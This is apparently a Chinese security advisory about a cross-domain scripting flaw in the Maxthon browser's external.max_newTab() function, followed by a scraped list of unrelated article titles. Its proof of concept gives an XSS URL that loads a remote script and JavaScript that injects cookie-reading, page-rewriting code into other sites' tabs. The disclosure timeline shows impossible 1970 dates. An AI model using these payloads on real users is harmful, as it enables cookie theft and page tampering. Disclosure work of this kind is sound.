漏洞详情

披露状态:

2010-07-21: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-04: 细节向第三方安全合作伙伴开放
1970-02-25: 细节向核心白帽子及相关领域专家公开
1970-03-07: 细节向普通白帽子公开
1970-03-17: 细节向实习白帽子公开
2010-08-21: 细节向公众公开

简要描述:

傲游浏览器是符合中国人使用习惯的多标签浏览器,拥有业界最优秀的在线收藏和广告过滤功能 。遨游浏览器在架构设计上存在一个安全缺陷,同时结合自身接口函数的安全问题,可以突破浏览器同源策略,导致一个跨域脚本漏洞。

详细说明:

遨游浏览器一个external接口函数没有遵循同源策略,存在一个跨域脚本漏洞。
漏洞函数external.max_newTab(),函数的功能是打开一个新的标签页。该函数存在一个时间竞争条件错误,可以突破同源策略跨域操作窗口对象,跨域执行任意脚本。
同时遨游浏览器自定义开发的external接口函数设定了一个信任域,该信任域包括*.maxthon.cn等,结合*.maxthon.cn任意web应用的一个脚本漏洞就可以调用漏洞函数external.max_newTab()执行跨域操作。

漏洞证明:

POC:
1. passport.maxthon.cn存在一个跨站脚本漏洞,通过跨站脚本漏洞可以调用漏洞函数,嵌入一个远程的js http://127.0.0.1/vul.js
http://passport.maxthon.cn/new/register_account.html?account="><script/src=http://127.0.0.1/vul.js></script>
2.调用漏洞函数的javascript脚本

hijack_code = "alert(document.cookie);document.write('hacked by rayh4c#80sec.com')"
t1 = external.max_newTab("a",'http://www.sina.com/',"activate:yes")
t2 = external.max_newTab("b",'http://www.baidu.com/',"activate:yes")
t3 = external.max_newTab("a",'http://www.sohu.com/',"activate:yes")
setInterval("t1.eval(hijack_code)",1)
setInterval("t2.eval(hijack_code)",2)
setInterval("t3.eval(hijack_code)",3)

危害结果:
新打开的三个标签页窗口将随机命中一个窗口跨域注入脚本运行,如百度网页被读取COOKIE并篡改网页。

修复方案:

1.修复*.maxthon.cn域名内的WEB应用漏洞。
2.修复有漏洞的接口函数external.max_newTab()。

遨游浏览器跨域域漏洞利用相关推荐

  1. DNS域传输漏洞利用总结

    操作基本的步骤是: 1) 输入nslookup命令进入交互式shell 2) Server 命令参数设定查询将要使用的DNS服务器 3) Ls命令列出某个域中的所有域名 4) Exit命令退出程序 攻 ...

  2. CORS漏洞利用检测和利用方式

    CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求. 检测方式: 1.curl访 ...

  3. 苹果零日漏洞利用市售800万欧元

    苹果移动操作系统iOS零日漏洞利用可致远程代码执行,市售800万欧元. 苹果零日漏洞可造成巨大破坏 由于以色列网络情报公司NSO Group备受争议的"飞马"(Pegasus)解决 ...

  4. 详解浏览器跨域访问的几种办法

    摘要: 本文讨论web前端安全问题以及应对措施,浏览器同源策略以及对资源跨域访问的几种解决方案 本文分享自华为云社区<Web安全和浏览器跨域访问>,原文作者:kg-follower   . ...

  5. CORS跨域资源共享漏洞

    目录 同源策略 解决跨域问题的方案 CORS CORS原理 CORS漏洞攻击流程 CORS漏洞案例演示 CORS漏洞挖掘思考 漏洞危害 漏洞修复 跨域资源共享 (CORS) 是一种浏览器机制,可以对位 ...

  6. 深入跨域问题(2) - 利用 CORS 解决跨域

    阅读目录: 深入跨域问题(1) - 初识 CORS 跨域资源共享: 深入跨域问题(2) - 利用 CORS 解决跨域(本篇) 深入跨域问题(3) - 利用 JSONP 解决跨域 深入跨域问题(4) - ...

  7. 【华为云技术分享】详解浏览器跨域的几种方法

    1前言 2背景知识介绍 2.1同源政策 2.2为什么要有跨域限制 3浏览器跨域的解决方案 3.1 CORS标准 3.2 CORS跨域判定的总体流程 3.3简单请求 3.4非简单请求 3.5 CORS相 ...

  8. nginx解决浏览器跨域问题_Nginx 反向代理解决浏览器跨域问题

    开门见山,最近利用空闲时间开发了一个简单的后端服务,从表里查询数据,一个简单的前端页面,通过Ajax请求访问后端接口,遇到了浏览器跨域的问题. 我后端的服务是localhost:8080,前端Hbui ...

  9. Vue学习笔记(三)Vue2三种slot插槽的概念与运用 | ES6 对象的解构赋值 | 基于Vue2使用axios发送请求实现GitHub案例 | 浏览器跨域问题与解决

    文章目录 一.参考资料 二.运行环境 三.Vue2插槽 3.1 默认插槽 3.2 具名插槽 3.3 作用域插槽 ES6解构赋值概念 & 作用域插槽的解构赋值 3.4 动态插槽名 四.GitHu ...

最新文章

  1. Vue 之qs 使用详解
  2. java commons.util_Java — CommonUtil
  3. J.U.C 提供的阻塞队列
  4. MxNet教程:使用一台机器训练1400万张图片
  5. Mongo客户端MongoVUE的基本使用
  6. opencv 亮度增强 二
  7. python调用自己写的函数_python调用自定义函数的实例操作
  8. java面试准备之---Struts2体系知识点,系统复习,struts2原理,ognl,el支持.---随时更新
  9. 基于THUCNews数据的BERT分类
  10. 体育成绩统计——20180801模拟赛T3
  11. HTML竖着写古诗,诗词竖着写的格式(例: 题临安邸 )
  12. 空间金字塔池化(Spatial Pyramid Pooling)
  13. 开发android怎么开发ios app,怎么开发ios android 都能使用的app
  14. 区块链的共识机制是什么?
  15. seo推广绩效考核指标是什么(新媒体运营的绩效考核指标)
  16. 分布式文件系统HDFS实践及原理详解part3
  17. win10配置python虚拟环境的路径
  18. 【风险管理】(第三篇)风险管理报表体系
  19. 计算机怎么关闭开机自启应用,如何关闭电脑开机自动启动的软件程序
  20. ztree调用的例子(复选框、checkbox)

热门文章

  1. php5.3.13 apc,PHP安装APC扩展
  2. Postgres的安装过程及问题
  3. 怎么在WEB页面上读取身份证信息
  4. java程序的运行机制详细分析
  5. 部署Vista – 第1部分:理解Windows AIK
  6. SPOT-4卫星数据介绍
  7. 无纸化会议私有化部署需要哪些设备?
  8. 导入3Dmax动画文件步骤
  9. 【HCIE-RS 天梯路】VLAN
  10. 解决win10pro局域网中自己电脑无法被其他电脑发现的问题